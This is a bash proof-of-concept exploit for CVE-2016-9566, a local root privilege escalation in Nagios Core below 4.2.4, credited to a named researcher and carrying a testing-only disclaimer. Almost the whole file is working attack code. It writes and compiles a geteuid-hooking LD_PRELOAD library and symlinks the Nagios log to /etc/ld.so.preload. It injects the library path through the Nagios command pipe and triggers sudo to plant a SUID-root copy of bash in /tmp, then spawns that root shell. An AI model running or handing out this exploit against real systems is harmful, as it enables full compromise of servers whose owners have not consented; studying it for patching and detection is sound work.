#!/bin/bash## Source: https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html## Nagios Core < 4.2.4Root Privilege Escalation PoC Exploit# nagios-root-privesc.sh (ver. 1.0)## CVE-2016-9566## Discovered and coded by:## Dawid Golunski# dawid[at]legalhackers.com## https://legalhackers.com## Follow https://twitter.com/dawid_golunski for updates on this advisory### [Info]## This PoC exploit allows privilege escalation from 'nagios' system account, # or an account belonging to 'nagios' group, to root (root shell).# Attackers could obtain such an account via exploiting another vulnerability,# e.g. CVE-2016-9565 linked below.## [Exploit usage]## ./nagios-root-privesc.sh path_to_nagios.log ### See the full advisory for details at:# https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html## Video PoC:# https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html## CVE-2016-9565:# https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html## Disclaimer:# For testing purposes only. Do no harm.#BACKDOORSH="/bin/bash"BACKDOORPATH="/tmp/nagiosrootsh"PRIVESCLIB="/tmp/nagios_privesc_lib.so"PRIVESCSRC="/tmp/nagios_privesc_lib.c"SUIDBIN="/usr/bin/sudo"commandfile='/usr/local/nagios/var/rw/nagios.cmd'functioncleanexit{# Cleanup echo-e"\n[+] Cleaning up..."rm-f$PRIVESCSRCrm-f$PRIVESCLIBrm-f$ERRORLOGtouch$ERRORLOGif[-f /etc/ld.so.preload ];thenecho-n> /etc/ld.so.preload
fiecho-e"\n[+] Job done. Exiting with code $1\n"exit$1}functionctrl_c(){echo-e"\n[+] Ctrl+C pressed"
cleanexit 0}#intro echo-e"\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n"echo-e"Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"# Priv checkecho-e"\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"id|grep-q nagios
if[$?-ne0];thenecho-e"\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n"exit3fi# Set target pathsERRORLOG="$1"if[!-f"$ERRORLOG"];thenecho-e"\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n"echo-e"./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log\n"exit3fi# [ Exploitation ]trap ctrl_c INT
# Compile privesc preload libraryecho-e"\n[+] Compiling the privesc shared library ($PRIVESCSRC)"cat<<_solibeof_>$PRIVESCSRC#define _GNU_SOURCE#include <stdio.h>#include <sys/stat.h>#include <unistd.h>#include <dlfcn.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>
uid_t geteuid(void){
static uid_t(*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");if( old_geteuid()==0){
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
unlink("/etc/ld.so.preload");}return old_geteuid();}
_solibeof_
/bin/bash -c"gcc -Wall -fPIC -shared -o $PRIVESCLIB$PRIVESCSRC -ldl"if[$?-ne0];thenecho-e"\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;fi# Prepare backdoor shellcp$BACKDOORSH$BACKDOORPATHecho-e"\n[+] Backdoor/low-priv shell installed at: \n`ls-l $BACKDOORPATH`"# Safety checkif[-f /etc/ld.so.preload ];thenecho-e"\n[!] /etc/ld.so.preload already exists. Exiting for safety."exit2fi# Symlink the Nagios log filerm-f$ERRORLOG&&ln-s /etc/ld.so.preload $ERRORLOGif[$?-ne0];thenecho-e"\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
cleanexit 3fiecho-e"\n[+] The system appears to be exploitable (writable logdir) ! :) Symlink created at: \n`ls-l $ERRORLOG`"{# Wait for Nagios to get restartedecho-ne"\n[+] Waiting for Nagios service to get restarted...\n"echo-n"Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] "read THE_ANSWER
if["$THE_ANSWER"="y"];then
/usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n"`date +%s`>$commandfilefisleep 3s
ps aux |grep-vgrep|grep-i'bin/nagios'if[$?-ne0];thenecho-ne"\n[+] Nagios stopped. Shouldn't take long now... ;)\n"fiwhile:;dosleep12>/dev/null
if[-f /etc/ld.so.preload ];thenrm-f$ERRORLOGbreak;fidoneecho-e"\n[+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges: \n`ls-l /etc/ld.so.preload`"# /etc/ld.so.preload should be owned by nagios:nagios at this point with perms:# -rw-r--r-- 1 nagios nagios # Only 'nagios' user can write to it, but 'nagios' group can not.# This is not ideal as in scenarios like CVE-2016-9565 we might be running as www-data:nagios user.# We can bypass the lack of write perm on /etc/ld.so.preload by writing to Nagios external command file/pipe# nagios.cmd, which is writable by 'nagios' group. We can use it to send a bogus command which will# inject the path to our privesc library into the nagios.log file (i.e. the ld.so.preload file :)sleep 3s # Wait for Nagios to create the nagios.cmd pipeif[!-p$commandfile];thenecho-e"\n[!] Nagios command pipe $commandfile does not exist!"exit2fiecho-e"\n[+] Injecting $PRIVESCLIB via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload"now=`date +%s`
/usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; $PRIVESCLIB\n"$now>$commandfilesleep 1s
grep-q"$PRIVESCLIB" /etc/ld.so.preload
if[$?-eq0];thenecho-e"\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload |grep"$PRIVESCLIB"`"elseecho-e"\n[!] Unable to inject the lib to /etc/ld.so.preload"exit2fi}2>/dev/null
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)echo-e"\n[+] Triggering privesc code from $PRIVESCLIB by executing $SUIDBIN SUID binary"sudo2>/dev/null >/dev/null
# Check for the rootshellls-l$BACKDOORPATH|grep rws |grep-q root 2>/dev/null
if[$?-eq0];thenecho-e"\n[+] Rootshell got assigned root SUID perms at: \n`ls-l $BACKDOORPATH`"echo-e"\n\033[94mGot root via Nagios!\033[0m"elseecho-e"\n[!] Failed to get root: \n`ls-l $BACKDOORPATH`"
cleanexit 2fi# Use the rootshell to perform cleanup that requires root privileges$BACKDOORPATH-p-c"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"rm-f$ERRORLOGecho>$ERRORLOG# Execute the rootshellecho-e"\n[+] Nagios pwned. Spawning the rootshell $BACKDOORPATH now\n"$BACKDOORPATH-p-i# Job done.
cleanexit 0
